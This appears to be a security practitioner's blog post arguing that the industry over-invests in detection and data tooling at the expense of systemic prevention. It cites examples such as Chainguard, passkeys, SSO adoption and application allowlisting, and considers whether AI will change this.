I attended RSA this year for the first time in over a decade. What stood out to me the most was the sheer number of vendors that exist today. You can’t help but notice how many more there are than back then, with more than 600 total this year. Of course, these are only those who attend RSA, and plenty choose not to participate for various reasons. There are estimated to be around 5,000 total security vendors, but even that number likely doesn’t include the small consultancies and open source teams out there.

A noticeable trend was that almost every vendor was either obtaining data, moving that data, or detecting patterns in the data. Identify vulnerabilities, check your security posture, obtain additional logs, collect more telemetry, pipe logs to your data lake, etc.

Very few attempt to address the problem at its source. You probably wouldn’t be happy if you hired a plumber, only to have them tell you that they’ve located three leaks in your attic and went home. Yet that’s exactly what we do in security.

Of course, good detection and response practices are needed too. Incidents will always happen, detecting and responding effectively to those that get through will always be required. Ideally, we want to prevent vast swaths of issues before they become incidents.

In this blog, I’ll be diving further into what I call systemic prevention and why it’s so hard to solve security at scale.

Identification vs. Prevention Vendors

There are a few good examples of preventative tools. An easy one to understand is when comparing vulnerability scanners with supply chain tools like Chainguard. The scanners tell you about problems but leave you with the fixes. Meanwhile, Chainguard just stops the issues from ever happening. Chainguard isn’t going to help you fix all your vulnerabilities, though, so it will only prevent a subset of the total.

Ideally, companies use both techniques to prevent vulns from occurring and identify the remainder. So many security teams forget that first step though. Engineering teams are often the ones to purchase tools like Chainguard because the security team has overwhelmed them with vulnerabilities and SLAs, leaving them to work out the problem themselves.

I think my point here was aptly put in Jason Chans recent article where he said:

“I was chatting with someone from a well known large tech company about security culture, and she told me their CTO wanted every engineer at the company to think “security first”. Of course, as security folks, we love to hear this. It sets the tone from the top and provides a lot of energy and support for the security team. However, I told her that I had almost the opposite approach culturally. I want developers to focus on what they were hired to do.”

The Challenge

Building identification tools is relatively straightforward - build a better sensor, create cleaner dashboards, add more integrations. But actually fixing problems? That’s complicated, messy, and demands long-term horizons.

The chart below from the 2025 Verizon 2025 DBIR report shows that credential abuse is trending down. While this can be attributed to many factors, the fact that password managers, SSO, passkeys, and automated controls to stop credential leaks have become more common certainly helps, most of which are preventative in nature.

DBIR 2025 report

Based on this graph, It makes sense that with developer AI tools getting better, the next focus will likely be on preventing vulnerabilities with automated patching and testing.

The Realm Of Tech Giants

It’s difficult to fix problems in large systems you don’t control, so prevention generally remains the domain of the tech giants who control the platforms. Some projects like passkeys required multiple large vendors to work together in their development. This historically has been… not great. Passkeys work great for enterprises but are still missing the mark for the wider public, and the fact that they do not work seamlessly across platforms is a massive contributor to that.

There are exceptions to the rule where small companies can grow rapidly with preventative tooling: Chainguard, 1Password, Resourcely, and more are clear examples, but they are the exception. Outside of vendors; memory safe languages like Rust ultimately save a lot of security issues before they happen as well.

The reality of most preventative security techniques is that there is one limiting factor, and that’s that the big tech platforms have the most capacity (and incentive) to improve security. As a startup, you can’t secure an operating system or a browser. You can get logs for it, build IOC lists and use logic to detect malicious behaviour. You can’t, however, change the underlying way it works to stop those things occurring in the first place easily. At best, you can provide better data to help people turn on the existing security settings

In addition, the big tech platforms directly compete with one another, giving them an incentive not to make cross-platform easy. Our example with passkeys above is a great example of this, where different implementations across platforms really limit its grand potential. In an ideal world, passkeys would be agnostic, able to sync across multiple platforms and have the same functionality on every platform. Instead, we have tables like this one from passkeys.dev that are too complex for a normal person to understand, but perhaps in 10 years or so, we’ll get close to having more green ticks.

state of passkeys

Consumers don’t generally pay for security. The B2C security market is incredibly small and generally taken up by a handful of VPNs and password managers. Big tech companies can use their leverage to fix security issues in platforms that affect both businesses and consumers.

The main point against platforms is that they make significant amounts of money selling services. It’s not impossible to think that eliminating issues would prevent income from consulting streams, so platforms would be hesitant to give up that recurring revenue. Look at most of the big EDR tools and they do not support application allowlisting, you need to go to smaller vendors for that. Every large security vendor has made a consulting acquisition lately and the Red Canary one just adds to that.

Everyone’s Different

Every company is different, and what’s an exception in one place is normal somewhere else. This can make it challenging to build a one-size-fits-all product since there will be edge cases for most.

Resourcely is a great example of preventative security in the AppSec space. They provide a number of out-of-the-box preventative rules to stop issues from happening in the first place via guardrails. Some customers will just turn it on, and it’ll work perfectly; most will have to spend a little time tuning, and for a number of edge case companies, it’ll be a lot of work to get integrated. The more complexity in your organisation, the more likely this is to happen. Distributed teams with lots of freedom to do what they want will likely have more use cases that a tool needs to cover than an organization with a single paved path. This drives those companies further down the path of customisation, meaning they end up using fewer products because it’s so difficult to replace simple use cases without significant organizational changes.

Normal vs Malicious Behaviour

It is extremely difficult to differentiate normal behaviour from malicious behaviour. Over the years, I’ve had all manner of weird behaviours pop up from staff for “legitimate” use cases.

This has included everything from scripts that chmod -R 777 recursively in prod every day to an employee reverse shelling into their workstation with a custom binary. People do weird stuff, and we can’t realistically use education to train such specific behaviours away. Ideally, we stop people from doing these things when they happen; otherwise, they have a nasty habit of becoming integrated into workflows and then spreading wider.

The point here is that because every company is different, and legitimately malicious behaviour is so hard to detect from normal behaviour. Providing out-of-the-box solutions that work for most of the population is difficult without lots of fine-tuning. This is then a constant endeavor that lasts forever. Plus, you now have to hire additional engineers to keep the tool running, adding to the long-term running cost.

Misalignment

An additional problem is that new security controls require everyone to adopt them. The problem when you write a standard is that people will disagree, build their own standard and now you have lost the benefits of centralisation.

It’s a miracle we managed to get single sign-on done on most SaaS applications. That in itself has taken more than 10 years and doesn’t include things like SCIM and single sign-out, which have limited coverage today. Just look at the recent discourse on authorization for MCP, and you can see much of the same problem. This isn’t a unique security problem, but we as engineers love to argue about the perfect solution, especially when everyone needs to adopt it.

Enter AI

Many people will read this blog and point to AI, saying that AI, paired with our collected data, will fix our problems. We simply won’t need preventive controls because AI powered tools will fix everything.

The reality is that many of the above points block AI from being a real fix. You’re still going to have to tune good/bad behaviour, vendors still won’t support many of the preventive controls needed for AI to take action and unless you are all in one big platform, you’ll need glue to make things work together.

While we will likely increase our detection rates, it’s still entirely possible for attackers to bypass it like the controls of today. Of course, given enough time, I’ll likely be proved wrong, but I think the time horizon here is many years and not just a few.

Much of the talk on securing AI itself uses the word “biological” in that you only control limited inputs. In this world, security issues are always present, and it’s about how the system responds and improves over time. Given this, I see only more threat surface rather than less, the big question is if AI security tools can cover that difference.

Hope for the future?

I must admit that we have made some good progress. If you look back over 3 years, you’ll see only minor changes, look back over 15 and you’ll see incredible progress. It’s easy to get disheartened but change does take significant amounts of time and our industry is still in its infancy.

Better identification has improved things, and even in the land of prevention, we’ve developed zero trust, passkeys, and more.

I do also think new takes on old ideas, some powered by AI, some powered by better UX and data, have a shot. I’m incredibly bullish on the next generation of application allowlisting and MCP-enhanced automated patching tools as areas with big potential here. True preventative controls that make attackers’ lives significantly harder are on the horizon, but they’ll take longer than you want.

I’ve also talked about sub-venture-scale problems. These are problems that are too small for VCs to care about, so they don’t get any investment, but they cause big problems. I think the opportunity cost of vibe coding has brought these down to realistic levels where you can fix them internally fast or potentially become a lifestyle dev.

Looking Forward

We need more people tackling the complex problem of preventative security, but it’s a tough sell. You’ll have a hard time building something that works for most people so you’ll have less potential customers. Not to mention the big platforms can wipe you out if they come up with a platform solution, and they have both more data and closer integration with the tools people already use.

Plus if you want to do preventative security internally at an enterprise you’ll spend most of your time dealing with people and communications more than tech. You’ll have to deal with people who critically need workflows you’re removing, and they won’t always understand or care about the big picture as to why.

It will be easier in 2025 to build an LLM that spits out more data, and the market loves to invest in this, not the long-term hard problems. Still, I think this is something worth striving for. After all, the best security incident is the one that never happens.